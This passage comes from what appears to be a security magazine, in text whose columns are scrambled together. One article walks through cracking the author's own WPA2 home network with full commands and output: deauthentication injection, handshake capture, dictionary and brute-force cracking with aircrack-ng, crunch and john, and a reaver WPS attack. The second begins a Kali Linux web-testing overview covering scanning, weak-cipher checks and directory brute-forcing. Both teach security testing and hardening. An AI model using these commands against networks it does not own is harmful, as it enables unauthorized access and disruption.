[13135.124989] usb 1-1: SerialNumber: 1.0
[13135.303101] usb 1-1: reset high-speed USB device number 10 using ehci_hcd
[13135.551689] ieee80211 phy6: Selected rate control algorithm minstrel_ht
[13135.552002] Registered led device: rt2800usb-phy6::radio
[13135.552023] Registered led device: rt2800usb-phy6::assoc
[13135.552042] Registered led device: rt2800usb-phy6::quality

Listing 2. WiFi dongle
root@kali:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:1c:42:41:9c:da
inet addr:10.211.55.8 Bcast:10.211.55.255 Mask:255.255.255.0
inet6 addr: fdb2:2c26:f4e4:0:21c:42ff:fe41:9cda/64 Scope:Global
inet6 addr: fe80::21c:42ff:fe41:9cda/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:12406 errors:0 dropped:0 overruns:0 frame:0
TX packets:6598 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:17247605 (16.4 MiB) TX bytes:424667 (414.7 KiB)
lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX bytes:11280 (11.0 KiB) TX bytes:11280 (11.0 KiB)
wlan0 Link encap:Ethernet HWaddr 00:12:0e:9a:f3:07

UP BROADCAST MULTICAST MTU:1500 Metric:1
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Listing 3. Checking the WiFi dongle
root@kali:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:1c:42:41:9c:da
inet addr:10.211.55.8 Bcast:10.211.55.255 Mask:255.255.255.0
inet6 addr: fdb2:2c26:f4e4:0:21c:42ff:fe41:9cda/64 Scope:Global
inet6 addr: fe80::21c:42ff:fe41:9cda/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX bytes:17248418 (16.4 MiB) TX bytes:424667 (414.7 KiB)
lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX bytes:11280 (11.0 KiB) TX bytes:11280 (11.0 KiB)

Additionally, we should kill any process that work that we want to attack. Once we see the
could interfere with our testing. The utility airmon- name of the network, we will need to record the
ng will help us identify processes that may be in- BSSID for that network. Additionally, we should
terfering with our WiFi adapter. record the channel for that SSID. It is assumed
that we will be dealing with one BSSID and one
root@kali:~# airmon-ng check channel. Many systems may have multiple ac-
cess points (AP) and thus will have multiple BS-
Found 3 processes that could cause trouble. SIDs and possibly multiple channels. It would be
If airodump-ng, aireplay-ng or airtun-ng stops recommended to attempt to attack each one in or-
working after a short period of time, you may want der to fully secure a system. Lets take a moment
to kill (some of) them! to dissect what we are seeing (Figure 2).
We are going to be working on my home network
PID Name poulsen3. From the capture, we can see that the
2799 dhclient BSSID for this network is 28:C6:8E:69:A7:EE and
3286 wpa_supplicant the channel is 11. We also receive several other
12104 NetworkManager fields that provide valuable information. Among the
fields displayed, we can ale see that ENC and CI-
In order to be safe, we will kill the above processes. PHER are shown to be WPA2 and CCMP. This tells
us that we have a WPA2 system that is secured
root@kali:~# kill 2799 by CCMP which will need to be cracked. As a side
root@kali:~# kill 3286 note, we also notice there is a linksys SSID with-
root@kali:~# kill 12104 in range that is open and unsecured. This network
would be quite easy to gain access to, if it were the
The next thing we need to do is to put the wire- network of interest. Fortunately, this is not our net-
less adapter in to monitor mode. work and it can be ignored. Now that we have a
BSSID and channel for the SSID in question, lets
root@kali:~# airmon-ng start wlan0 stop the monitoring and restart it with these specific
Interface Chipset Driver details. Press CTRL-C to stop the monitor, then re-
wlan0 Ralink RT2870/3070 rt2800usb [phy6] start it as follows. Remember to replace the BSSID
(monitor mode enabled on mon0) below with your own APs BSSID and the channel to
match that which shows up in your terminal.
You should see the line printed monitor mode en-
abled on mon0. Confirm that it is active: root@kali:~# airodump-ng mon0 --bssid
28:C6:8E:69:A7:EE --channel 11
root@kali:~# airmon-ng
Interface Chipset Driver The monitor will now stick to one channel and will
mon0 Ralink RT2870/3070 rt2800usb [phy6] focus on only one BSSID, which will allow us to
wlan0 Ralink RT2870/3070 rt2800usb [phy6] narrow our attack. Since we are not yet logging
data to a file, we will let this run until we are ready
The mon0 device shows that we have an active to capture data to begin the attack.
pseudo-device that is monitoring wlan0. From now
on, we will use mon0 as our device since it is setup
as a monitor mode of wlan0 that allows us to mon-
itor the WiFi traffic or inject WiFi packets through
it. To begin capturing data, we will use airodump-
ng. This tool will begin capturing the communica-
tion that our wireless device can see. We will start
the capture on all channels and all BSSIDs.
root@kali:~# airodump-ng mon0
Let it run awhile and see what we pick up. What

we are looking for is the SSID (name) of the net- Figure 2. Airodump Scan Output

WiFi Packet Injection lier, there are several injection methods that can be
There are times where we would like to send a used. We will try the first method (-0), which is de-
packet over the air to be interpreted by another described by the help page as deauthenticate 1 or all
vice in order to prompt some action. This is similar stations This method will send a fake packet from
concept to that of IP spoofing on a wired network. the AP to the device, asking it to de-authenticate
Since we are simply monitoring a network we do and thus prompting it to re-authenticate. It is this re-
not have access to, we would need some way to authentication that we wish to capture and use in
be able to inject a packet in order to impersonate a our password attack. Before we continue, it is im-
device or impersonate the access point. This opera- portant to understand the top-line output of airod-
tion is referred to as packet injection. It is not neces- ump-ng, which should still be running and collecting
sary to learn about injection or to use this technique data. Look at the following sample top-line:
when we have some control over the network under
attack. Our main reason for injecting a packet is to CH 11 ][ Elapsed: 18 mins ][ 2013-09-29 15:54
get a device to perform a key exchange so that we ][ WPA handshake: 28:C6:8E:69:A7:EE
can capture it for cracking. If we have either a) le-
gitimate network access from another device or b) Notice that last section indicates we have a val-
plenty of time, then we skip packet injection and can id WPA handshake for our BSSID. This is what
instead simply force a wifi authentication from the we are looking for and once we have this, we can
device itself or wait until a key exchange happens begin cracking. This section will be displayed on-
to occur. Regardless, we will assume that the key ly after a WPA handshake is observed. However,
exchange needs to be provoked and thus will inject since we have not logged any data, in the end we
a fake packet to prompt it along. have nothing to aid us in our cracking.
While airodump-ng is still running, open another For this exercise, if you see this WPA handshake
terminal and sudo -i to become root. In this termi- entry in your monitor, simply press CTRL-C to stop
nal, we need to check if injection will work on the the monitor, then restart it. We want to go through the
WiFi dongle and AP that we are monitoring. We will exercise of forcing a handshake to see it as it occurs.
use aireplay-ng to perform the injection. This utility Lets try a broadcast de-authentication injection:
has several ways to inject packets to prompt a key
exchange. These are selected by the arguments root@kali:~# aireplay-ng mon0 -a
-0 through -9 which are simply short hands to the 28:C6:8E:69:A7:EE -0 1
various sub-tools within this utility. The -9 option al- 15:56:45 Waiting for beacon frame (BSSID:
lows us to test the injection: Listing 4. 28:C6:8E:69:A7:EE) on channel 11
We expect to see Injection is working!, which is NB: this attack is more effective when
displayed. Therefore, we can continue. If we do not targeting a connected wireless client (-c
see this result, we may repeat the command a few <clients mac>).
more times or we may need to try a different WiFi 15:56:46 Sending DeAuth to broadcast -- BSSID:
dongle. It is also important to note that we may need [28:C6:8E:69:A7:EE]
to be closer to the AP in order for the packets to
be received. Now that we have gotten injection to If all goes well, your monitor will suddenly show
work, lets next test a real injection. As stated ear- the WPA handshake line. Additionally, you may
Listing 4. Aireplay-ng injection checking
root@kali:~# aireplay-ng mon0 -a 28:C6:8E:69:A7:EE -9

15:39:21 Waiting for beacon frame (BSSID: 28:C6:8E:69:A7:EE) on channel 11
15:39:21 Trying broadcast probe requests...
15:39:21 Injection is working!
15:39:23 Found 1 AP
15:39:23 Trying directed probe requests...
15:39:23 28:C6:8E:69:A7:EE - channel: 11 - poulsen3
15:39:24 Ping (min/avg/max): 1.569ms/24.885ms/41.820ms Power: -56.90
15:39:24 29/30: 96%

have a few entries that allow you to learn about root@kali:~# airodump-ng mon0 --bssid
which devices are connected. 28:C6:8E:69:A7:EE --channel 11 -w myfiles
Protect BSSID STATION The -w option tells it to dump the captured data
PWR Rate Lost Frames Probe to a capture file. This file will be used in our pass-
28:C6:8E:69:A7:EE 00:15:E9:F9:76:9B -76 1 word cracking attempts. Now that it is running, at-
-36 0 9 tempt the injection again:
28:C6:8E:69:A7:EE 28:CF:E9:15:FD:C7 -16
1e- 1e 0 7 root@kali:~# aireplay-ng mon0 -a
28:C6:8E:69:A7:EE -0 1
One thing to note is if the broadcast de-authenti-
cation does not work, you should try it again with You may want to replace the injection command
the -c option to single out specific devices to de- above with the one that worked on your system.
authenticate. Next we wait for airodump-ng to report a WPA
handshake, then press CTRL-C.
root@kali:~# aireplay-ng mon0 -a Now we should see our capture files:
28:C6:8E:69:A7:EE -0 1 -c 28:CF:E9:15:FD:C7
15:59:15 Waiting for beacon frame (BSSID: root@kali:~# ls myfiles*
28:C6:8E:69:A7:EE) on channel 11 myfiles-01.cap myfiles-01.csv myfiles-01.kismet.
15:59:16 Sending 64 directed DeAuth. STMAC: csv myfiles-01.kismet.netxml
[28:CF:E9:15:FD:C7] [26|61 ACKs]
The three files, myfiles-01.csv, myfiles-01.kis-
Or course, if you are attacking your own network, met.csv, and myfiles-01.kismet.netxml, are simply
you simply need to use the MAC address of a variations of the data we see when running it live.
known laptop on your network without having to wait It is myfiles-01.cap where the full data lies.
and learn which devices are using the WiFI network. Now that we have a capture file that contains a
In short, we need to capture a WPA handshake. WPA handshake, we are done with the WiFi net-
We can obtain this handshake by simply waiting work. The remaining testing will be concerned with
until it naturally occurs or we can provoke a device uncovering the password of our network by using
into performing this handshake by injecting fake only the captured file. The password cracking may
packets that ask it to de-authenticate and thus re- take quite a bit of time, but it can be done offline
authenticate. Once we are able to provoke a WPA and in the background. It is important to remember
handshake, we are ready to repeat these tests that intruders often have much time and comput-
with logging enabled, so that we can capture this ing power. In order to protect against this, we need
data for off-line processing. to be willing to give some time to our crackers in
Additionally, there are other methods of injection of order to verify that we are secure.
which some are a bit trickier and some are only sup-
ported for WEP mode. If mode -0 fails, you may want Password Cracking
to try one of the other methods or simply wait until a Inside the myfiles-01.cap file, we have the da-
device is legitimately connected to the WiFi network. ta which contains a WPA handshake or key ex-
change. Within this handshake we have, in es-
Putting it All Together sence, an encrypted version of our WiFi password.
Now that we are able to capture a key exchange, It is this password that we seek and now we need
we will repeat this process while logging the cap- to work on this file until we can extract the pass-
tured data. We purposely did not log to a file so that word. Since we have an encrypted password, the
we can investigate what works and obtain some only reasonable method we can use to obtain it is
ESSIDs that might be susceptible to de-authenti-
cation requests. This allows us to avoid accumulat-
ing large amounts of data until we are truly ready
to begin. Everything up to this point was mostly
exploratory and now we begin the real work. Lets
first stop the airodump (CTRL-C) and restart it with
logging enabled. Figure 3. Targeted Airodump Scan Output

by repeated attempts of guessing passwords. With password. In order to use those method, we will not
this method, we will guess passwords, encrypt use the dictionary, but will instead use the output
and/or hash them, then compare the encrypted/ of a utility called crunch. This utility will sequence
hashed version to that which we captured. When through all combinations, which will make it pain-
they match, we know we have the right password. fully slow. It requires two arguments which are the
In order to guess many passwords, we will use air- minimum and maximum password lengths. We al-
crack-ng along with a dictionary. The dictionary will so have the option to specify valid password char-
be used as the source of passwords to guess. Lets acters if we choose to do so. This might come in
start by finding a suitable dictionary. Our choice of handy if we want to brute-force through all the nu-
dictionary may very well determine if we are suc- merical digits only. For now, we will use the defaults.
cessful or not so it is important to pick a fairly large
one. Dictionaries can be obtained on the Internet root@kali:~# crunch 8 8 | aircrack-ng -a 2
from sites such as http://www.outpost9.com/files/ myfiles-02.cap -b 28:C6:8E:69:A7:EE -w -
WordLists.html. We will use the dic-0294.zip dic-
tionary from this page. Be sure to unzip the diction- This will attempt to guess all eight character al-
ary to obtain the file dic-0294.txt. Once you have a phabetic passwords on a new capture. This new
valid dictionary, it is time to begin the cracking. capture (myfiles-02.cap) was created per the pre-
vious instructions, after the WiFi password was
root@kali:~# aircrack-ng -a 2 myfiles-01.cap -b changed. It may be desirable to estimate how
28:C6:8E:69:A7:EE -w dic-0294.txt long it will take to complete the password guess-
ing by using crunchs output along with aircrack-
This command will force WPA2 cracking on our BS- ngs output.
SID using the dictionary file we downloaded. Our
hope is that the network is secured using dictionary root@kali:~# crunch 8 8 > /dev/null
words. Once we run this command, we must wait for
possibly a long time. If we are lucky, the password Crunch will now generate the following amount of
may be found quickly, as was mine (Figure 4). data: 1879443581184 bytes.
This may not always produce a found password. 1792377 MB
Especially, if the password is much more complicat- 1750 GB
ed. One thing to keep in mind is that with a purpose 1 TB
of securing the system, you must attack your own 0 PB
system harder than a possible intruder would, in or- Crunch will now generate the following number of
der to ensure it is tightly secured. What happens if lines: 208827064576
this method fails to find our passwords? We then
must try other methods with the intention of truly try- This tells us we have 208827064576 passwords to
ing to crack it. Only if all of our attempts are thwart- guess and aircrack-ng tells us it can test 1150 keys
ed can we have some surety that our system will per second. After some calculation, we find that we
withstand an intruders attack. Perhaps a larger dic- can test all the possible passwords of eight alpha
tionary, or a brute-force method would be in order. letters in just over 5 years! Now you can see why
I choose my password to start with aaaaaz. This
Brute-Force ensures that it is more quickly found. Finding the
Changing our WiFi password to aaaaazaa will password took only ten minutes, but that is only be-
make it significantly easier to brute-force crack the cause we were near the beginning of the search
(aaaas). Of course, for most passwords, we cant
expect it to be near the beginning and even worse,
if our password is just one character longer, that
is nine characters long, then we might expect 149
years to crack it. Furthermore, if we add numbers
and symbols into the mix, then we further increase
the testing time. This clearly shows why random
passwords are much more secure than dictionary
based passwords. It should also be noted that the
Figure 4. Aircrack Password Found cracking of the passwords can be sped up by us-

ing a higher performance Linux PC versus a virtu- the password of our network. In order to prevent
al machine or even multiple PCs that are working reaver from cracking your system, we must disable
on the same file, but using different ranges of the WPS in your router, if it is possible. Lets examine
brute-force set. a reaver attempt to crack a WiFi network via the
WPS exploitation.
Modified Brute-Force Before we run reaver, we should check if our router
Since a brute force likely takes too long to achieve has WPS active: Listing 5.
in our lifetimes and a dictionary attack does not We let this run until we see our AP which we want
cover some common passwords, we may want to test, then CTRL-C to abort. If our AP shows a
to use a modified approach. We can get smarter WPS Version and WPS Locked is No, then we
about guessing passwords by guessing things like should be able to use reaver to obtain our pass-
poulsen1 or myw1f1. In order to do this kind of word. One way to start reaver is to first perform a
approach, we could write our own script or we could fake authentication using aireplay-ng:
use the utility john. This utility is designed to crack
password files, but using the -stdout option, we can root@kali:~# aireplay-ng mon0 -1 120 -a
simply generate a password list output. 28:C6:8E:69:A7:EE -e poulsen3
root@kali:~# john -w:dic-0294.txt -stdout Once this has shown that we are authenticated,
-rules we leave it running and in another terminal, start
reaver.
It is not necessary to keep cracking our WiFi net-
work at this time as we can simply use john to root@kali:~# sudo reaver -i mon0 -A -b
see if our password is solid. Lets start with dead- 28:C6:8E:69:A7:EE -vv
beef again and check it with john (Figure 5).
We may need to experiment with the -S, -N, and/
root@kali:~# john -w:dic-0294.txt -stdout or -L options to get it to work. We experiment un-
-rules | grep deadbeef til we find some settings of reaver that shows pro-
gression of the pin attempts. Next, we would let it
As we can see, deadbeef is guessed along with run for several hours and we are almost guaran-
many other variations. Ideally we might want to teed to obtain the password. Reaver will continue
find a password that john wont even guess, but until the password is found.
there is also the matter of how long will it take to
guess it. Even if john can guess the password, Locking the System Down
how long will it take? Is it long enough for us to We have thus so far went through the exercise of
consider our system secure? Furthermore, we testing WiFi susceptibility to various attacks with
can modify johns rules to create more elaborate the purpose of assessing our WiFi network. At
alterations of passwords or even create a python the end of these exercises we must come up with
script that does exactly what we want. In short, if some measures that allow us to prevent these at-
we dont know the password, we simply use john tacks from outsiders. Although we cannot com-
or a custom tool to create a password list that is pletely lock down any system that selectively al-
piped into aircrack-ng: lows outside access, our goal should be to stay
root@kali:~# john -w:dic-0294.txt -stdout

-rules | aircrack-ng -a 2 myfiles-01.cap -b
28:C6:8E:69:A7:EE -w -
Once again, the original deadbeef password is

quickly cracked.
Reaver
A WiFi attack discussion is not complete without
talking about reaver. Reaver is a utility that takes
advantage of WPS to almost certainly discover Figure 5. John Password Generation

ahead of the intruders. One of the first things we matters. A system that runs like this periodically
must conclude is that WPS needs to go. We should will constantly monitor our wifi security in the back-
not have WPS active in our system. It is a major se- ground and can be a front-line defense that catch-
curity hole that provides little to no benefit. Disabling es many holes in our system that are caused by
WPS will greatly increase the security of our system. negligence such as someone changing the pass-
If our router does not support the disabling of WPS, word to something that is insecure.
then the router needs to go. It is NOT enough to dis-
able WPS without following it up by testing vulner- Summary
ability with reaver. We should not rely on our routers It is imperative that we take the lead in testing our
settings to tell us what it is doing. We should instead own systems in order to prevent unauthorized ac-
test it ourselves. Several routers claim to disable cess. In being aware of the vulnerabilities, we can
WPS, but yet still remain vulnerable to a WPS attack. make conscious decisions as to what we want to al-
The next thing we must do to lock down the sys- low our WiFi users to have access to. We can either
tem is to choose a strong password. Here are lock it down tight with respect to content access, or
some guidelines in choosing the password: take the time to ensure the system is of high securi-
ty. Continual testing with the latest tools is essential
Lean more towards 64 characters in length and a distribution such as Kali Linux aids in keeping
versus 8 characters in length. us armed with the most recent developments. As
Lean more towards random passwords versus IT professionals, it is important that we do not use
dictionary based passwords. technologies that we do not understand as well as
Mix lower and upper case along with numbers. the potential attackers. This article was designed to
Change your passwords regularly. help us assess our WiFi networks, but also to help
us gain understanding as to how WiFi systems are
You could choose an easy to remember pass- typically attacked, allowing us to be aware of this
word that is strong, such as sheepdog93black technology, along with its vulnerabilities.
coat42travel or welcometoCOMPANYpleaseenjoyour
privatewifi. Steve Poulsen
Once we have set the password, we need to Steve Poulsen is the Director of Technology for
retest our security using the above procedures. Communication Systems Solutions, LLC (CSS).
When we have a good process to test our system, Steves background is in digital signal processing,
we could set it up as a script and run it in as a cron digital audio and video Processing, and embedded
job periodically which emails us the results. We Linux design and development. He current man-
can make sure to run the aircrack-ng as nice/ion- ages the embedded software development team
ice so that it doesnt bog our system down, if that for CSS, which also includes IT responsibilities.
Listing 5. Checking router WPS status
root@kali:~# wash -i mon0 -C -s

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel RSSI WPS Version WPS Locked ESSID

----------------------------------------------------------------------------------------------------
3C:81:D8:2A:AD:58 1 -79 1.0 No WIN _ ad59
30:46:9A:1C:63:08 2 -83 1.0 No NETGEAR
C8:D7:19:46:EF:02 4 -85 1.0 No Linksys75366
60:A4:4C:27:9D:28 6 -73 1.0 No (null)
00:1E:E5:82:64:9C 6 -89 1.0 No linksys
20:AA:4B:2A:8F:87 6 -91 1.0 No ShinyCedar
10:0D:7F:78:5B:65 8 -91 1.0 No NETGEAR68
28:C6:8E:69:A7:EE 11 -55 1.0 Yes poulsen3
44:94:FC:5B:31:BE 11 -87 1.0 No NETGEAR34

SCENARIOS
Web Applications with

Kali Linux
In March 2013, a new penetration testing sharing with 300 Debian
compliant packages and written in eight (8) different languages
was born. It is named Kali Linux. Kali Linux is the right place for
learning hacking and performing penetration testing when it
comes to security testing tools. Lets rephrase the metaphore of
Patrick Engebretson about BackTrack by saying that Kali Linux
reminds cyber security professionals of that scene in the Matrix
movie where Tank asks Neo What do you need other than a
miracle? Neo replied by saying Guns. Lots of Guns.
I
n the same way and same line of thought, pen- generation of the industry-leading BackTrack Linux
etration testers and hackers have that inkling or penetration testing and security auditing Linux dis-
feeling when they first fire up Kali Linux. Secu- tribution. Many penetration testers and serious
rity Tools. Lots of Security Tools. The entire dis- hackers use Linux-based open source penetration
tribution is built from the ground up for penetra- test tools from which to launch their attacks. Kali
tion testers and hackers. It comes preloaded with Linux contains a number of tools that can be used
numerous security tools that are installed, config- by security professionals during a security assess-
ured, and ready to be used. Kali Linux is the new ment process and vulnerability assessment. In this
Table 1. Security tools categories

Category Purpose
Information gathering This category contains several tools that can be used to get information regarding a target DNS, routing
and many more.
Vulnerability Analysis In this category you can find tools to scan multiple vulnerabilities.
Web Applications This category contains tools that can be used in auditing web application.
Password Attacks This category holds tools that can be utilized to crack simple and complex passwords.
Wireless Attacks This section maintains tools for checking wireless networks, Bluetooth and Radio.
Exploitation Tools Tools in this category will help exploit the vulnerabilities and gaining access to the target machine, you
can use tools in this category to escalate your privilege to the highest privilege.
Sniffing/Spoofing This section contains tools that capture network packages.
Maintaining Access Tools in this category will be able to help you in maintaining access to the target
Reverse Engineering This category contains tools that can be used to debug a program or disassemble an executable file.
Stress Testing Tools in this category are used for flooding network and testing for denial of services.
Hardware Hacking This section holds tools that are useful for mobile devices such as Android.
Forensics In this category you can find several tools that can be used to do digital forensics such as acquiring hard
disk image, carving files, and analyzing hard disk image.

article, we will begin with a brief overview of Kalis the new wild west at the same time a new small
features then focus on how to perform web appli- village which brings everyone closer to one anoth-
cation testing using the tools installed in Kali Linux. er. As technology advances, the demand of new
The security tools including in the following cat- cool things about technology gets higher and high-
egories: Table 1. er. Consequently, people precipitate to push every-
The Figure 1 illustrates the different categories thing to the internet and web applications which cre-
tool set in Kali Linux. ate new vulnerabilities and exposure for hackers.
Jeff Bezos, the CEO and founder of Amazon.com
once narrated an anecdote about what he thought
to be his favorite software vulnerability in the ear-
ly days of Amazon.coms existence. So the issue
was that when selecting an item to purchase, the
end-user could put in into a text box the number
of such items they wanted to order. The customer
could also enter a negative number, and Amazon.
com would automatically credit the customers ac-
count. And because were dealing with products,
services, and ultimately lot of cash, the web ap-
plication vulnerabilities can lead to serious issues.
So this piece of writing will allow web application
developer, application owner and security profes-
sionals to have a good understanding about the
Figure 1. Kali Linux Tools Category technical details and methodology behind the web
attack using tools in Kali Linux. The first step in
Of course before installing and using Kali, it web application testing with kali Linux is to gather
needs to be downloaded first and anyone can get a high-level understanding of the target web ap-
Kali Linux from http://www.kali.org/downloads/. On plication. By doing that the tester needs to ask the
Kali website, one will find many versions or flavors following questions: Is there a special client neces-
of Kali Linux, so it is up to that individual to get the sary to connect to the application? What transports
flavor he/she wishes. Kali Linux, like its predeces- does it use? Over which ports? How many servers
sor, is completely free and always will be. No one are there? Is there a load balancer? What is the
will never, ever have to pay for Kali Linux. Accord- platform of the Web server? Are external sites re-
ing to the documentation, Kali has been developed lied on for some functionality?
to adhere to the Filesystem Hierarchy Standard The answers to these questions should be a
(FHS), allowing all Linux users to easily locate bi- piece of cake if and only if the tester is equipped
naries, support files, libraries, etc. Kali Linux Kali with Kali Linux which has abundant tools that al-
Linux to support as many wireless devices as we low you to get information about the target. First,
possibly can, allowing it to run properly on a wide lets begin with profiling our target by finding out
variety of hardware and making it compatible with which registrar handles the domains of the target
numerous USB and other wireless devices. organization. Profiling the target using whois as
As we all know that web applications are no doubt
the most widespread attack vectors because most
of them are connected to the Internet. Almost every
organization today has some kind of web presence,
and more often than not, that web presence is dy-
namic and user-driven. Many todays websites and
applications contain complex coding with backend
database-driven transactions and multiple layers
of authentication. The new trend is that organiza-
tions are also leveraging the power of an execut-
able web. Online banking, shopping, and social me-
dia are now common place because everything is
interconnected. In many ways, the Internet is like Figure 2. Whois in Kali

SCENARIOS
shown the Figure 2. The good news is that Mantra vious features of a Web application that malicious
-which is a browser especially designed for web attacker will identify and going to exploit are vul-
application security testing and part of Kali tools nerabilities in the Web server software such as IIS,
set- is very useful when it comes to profiling and Apache, and Netscape. So no matter the sturdiness
enumeration. Mantra has many built in tools for of the design, there is no application that can stand
information gathering and finding documents that for very long on a vulnerable web server platform.
belong to the target organization.
Figure 6. OpenSSL For SSL Port
echo e HEAD / HTTP/1.0\n\n | openssl s_client

quiet connect TargetHost:443
SSL and Transport Layer Security (TLS) are pro-

tocols that provide secure channels for the protec-
tion, confidentiality, and authentication of the in-
formation traversing the wire. Considering the crit-
Figure 3. Mantra in Kali Linux icality of these security implementations, it is im-
portant to verify the usage of a strong cipher al-
Before beginning the platform enumeration, the gorithm and its proper implementation. In order to
tester needs to find out which port the web server detect possible support of weak ciphers, the ports
is using. This process is called service discovery, liked to SSL/TLS services must be identified.
and it is carried out using port scanning for a list of When accessing a web application via the https
common Web server ports. Tools like Nmap and protocol, a secure channel is established between
Netcat can be very handy when it comes to scan- the client and the server. The distinctiveness of
ning and banner grabbing. one the server or both client and server is then
This Figure 4 and Figure 5 shows nmap com- established by means of digital certificates. In or-
mands for getting information about the service der for the communication to happen, a number of
description and port. safety checks on the certificates must be passed.
Kali has tools that can be used to identify weak
ciphers. Kali Linux has many tools such sslscan,
tlssled handy for identifying weak ciphers. One of
my coworkers, Shawn Evans, Senior Penetration
Tester at Knowledge Consultant Group (KCG) has
published an SSL scanner tool called SSLSnake
thar is very powerful. SSL Snake can be down-
loaded in the following link https://code.google.
Figure 4. Service Discovery Using Nmap com/p/sslsnake/downloads/list.
The Figure 7 shows the usage of SSLSnake
script.
TLSSLed is another to for scanning weak ciphers
as shown Figure 8.
Figure 5. Server Version
For connecting to Secure Socket Layer (SSL)

services, OpenSSL is favorable for port 443 ban-
ner enumeration. As a security engineer you need
to keep in mind that the most transparent and ob- Figure 7. Weak Ciphers Identification Using SSLSnake

discovered by hackers and security engineer are
put forward to candidate naming authority (CAN).
Afterward, the vulnerability get verified and as-
signed to a number. So searching for vulnerabil-
ity in the Exploit Database website (Long Slash
Directory Listing, ISAPI DLL Source Disclosure,
etc...) on the web server is a good starting point. It
should be noted that not all software vendors pub-
lish vulnerabilities in a public, and therefore these
Figure 8. Weak Ciphers Identification with tlssled bugs are not recorded within public vulnerabili-
# openssl s_client -connect Targethost:443 -cipher ty databases. This information is only revealed to
EXPORT40 customers or published through fixes that do not
# openssl s_client -connect Targethost:443 -cipher come with advisories. So using searchsploit tool
NULL in Kali, a tester can search and discover for many
# openssl s_client -no_tls1 -no_ssl3 -connect published vulnerabilities.
targethost:443 The Figure 9 and Figure 10 show the reader how
# ./sslSnake.py -h target -low ssl2 -v to launch and search for vulnerability in the public
database.
There are many published vulnerabilities out there OpenVAS which is another handy tool in Kali can
depending on the web server platform. The Ex- be used to identify vulnerabilities on the web serv-
ploit Database website allows a tester or hacker. OpenVas is a collection of integrated security
er to search for common vulnerability exposures
(CVEs) or through the Open Sourced Vulnerabil-
ity Database (OSVDB). CVEs are public certified
information security vulnerabilities or exposures.
Essentially, security vulnerabilities or exposures
Figure 11. Starting OpenVas
Figure 9. Searching for Vulnerability
Figure 10. Using Searchsploit in Kali Figure 12. Login to OpenVas

SCENARIOS
tools and services that offer a powerful platform for ab web interface. Afterward, the tester can begin to
vulnerability management. It has been developed map the entire Web application and gather enough
on the basis of client-server architecture, where data for the analysis. The goal is to retrieve all the
the client requests a specific set of network vulner- possible information from the Web application and
ability tests against its target from the server. Its organize it in some structured way. The outcome
modular and robust design allows the tester to run of this process will give us a Web application map
the security tests in parallel and is available for a organized into functional groups. While mapping
number of operating systems. the entire web application, the tester needs to ask
The Figure 11-13 show the tester how to initiate him-self the following questions:
and login to OpenVas web interface. Does this page or something on the application
At this point the tester can fire up a web scanner talks to a database, or another system? If the an-
and vulnerability identification using many tools swer is yes then the tester needs to start looking
listed under Web Applications category in Kali for SQL and LDAP. Can someone see what the
such as arachni, owasp-zap, w3af, websecurify or end-user types? If the response is affirmative then
Wapiti under Kali Linux. Another useful tool in Kali there will be a need to test for XSS. Does this page
Linux is owasp-zap which is integrated testing tool point to a local or remote file? If the answer is af-
for discovering vulnerabilities in web applications. firmative then the tester has to test Local/Remote
Here is owasp-zap as shown the Figure 14. This File includes.
Figure 15 illustrates the rich and powerful webscar- Another recommended activity to do before sur-
veying the application is to go to every page and
link. Become custom with the application. Glance
for all the menus, watch the directory names in the
URL change as you navigate. In essence, get a
feel for the site. That should purge any tendency to
mindlessly click through the web application when
it comes time to seriously inspect the application.
Web applications are complex because the way
they interact with other sites and applications. So
they may contain a dozen files, or they may con-
tain a dozen well-populated directories. Either way,
writing down the applications structure in a good
Figure 13. OpenVas Vulnerabilities Web Interface habit because it helps you track insecure pages
and provides a good way for orchestrate an effec-
tive attack. The tester can begin to record page
name, full path to the page, at the same time asks
himself the following questions: does the page re-
quire some form of authentication? Does the page
require SSL? The tester can also identify the differ-
ent arguments GET and POST that are passed to
the page and a back-end database.
Keep in mind that it is always a good idea to
check for obvious obfuscation like the ones below.
Hex 1234567E3136382E1234502E313A6F77617370753456
Figure 14. OWASP-ZAP 7817373776F72643A31353A3538
Base64 MTkyLjE2OC4xBYuicfKpvd2FzcHVzZXI6cGF
zc3dvcmQ6MTU6NTg=
MD5 03c2fc7f0a809afd457120bd34dd40aaa
Identifying the type of obfuscation or hash, may

assist the tester to decoding some sensitive or
useful data. In addition, it may be useful to enu-
Figure 15. WebScarab merate the encoding in place from the format of

the message. Furthermore, if both the format extensions. File extensions can also expose ad-
and obfuscation technique can be guessed then ditional systems connected to the application. It
brute-force attacks could be devised. Many to- should be noted that include files often contain ap-
kens may include information such as user identi- plication variables and constants, database con-
fication or server location address with an encod- nection strings, or SQL statements. Using DirBus-
ed portion. The good news is that Kali Linux has ter in Kali, the tester can discover many sensitive
a tool called has-identifier which recognizes the and useful files on the web server. DirBuster is a
type of hash that is used. multi threaded java application designed to brute
As shown the Figure 16 Hash Id is a handy tool force directories and files names on web or ap-
to recognizing the hash used. plication servers. Often is the occurrence of what
looks like a web server in a state of default instal-
lation is actually not, and has pages and applica-
tions hidden within.
As shown Figure 18 DirBuster is very useful and
easy to utilize tool.
Figure 16. Hash Identifier

The tester can use lynx which is a text-based
Web browser found on many UNIX systems. It pro-
vides a quick way of navigating a site, although
extensive JavaScript will inhibit it. You will find that
one of its best uses is downloading specific pages.
The Figure 17 illustrates the usage of lynx test-
based browser.
Figure 18. DirBuster in Kali

Authentication and authorization play critical
roles in the security of an application since all
succeeding security decisions are typically made
based on the identity established by the supplied
credentials. A web application will typically require
a user to enter a username and a passphrase to
prove the user is who he says he is. Most types
of web application authentication use usernames
and passwords to authenticate a user. Although
not the coolest, nicest and sexiest of the attacks,
Figure 17. Lynx Text-Based Web Browser
password guessing is the most effective technique
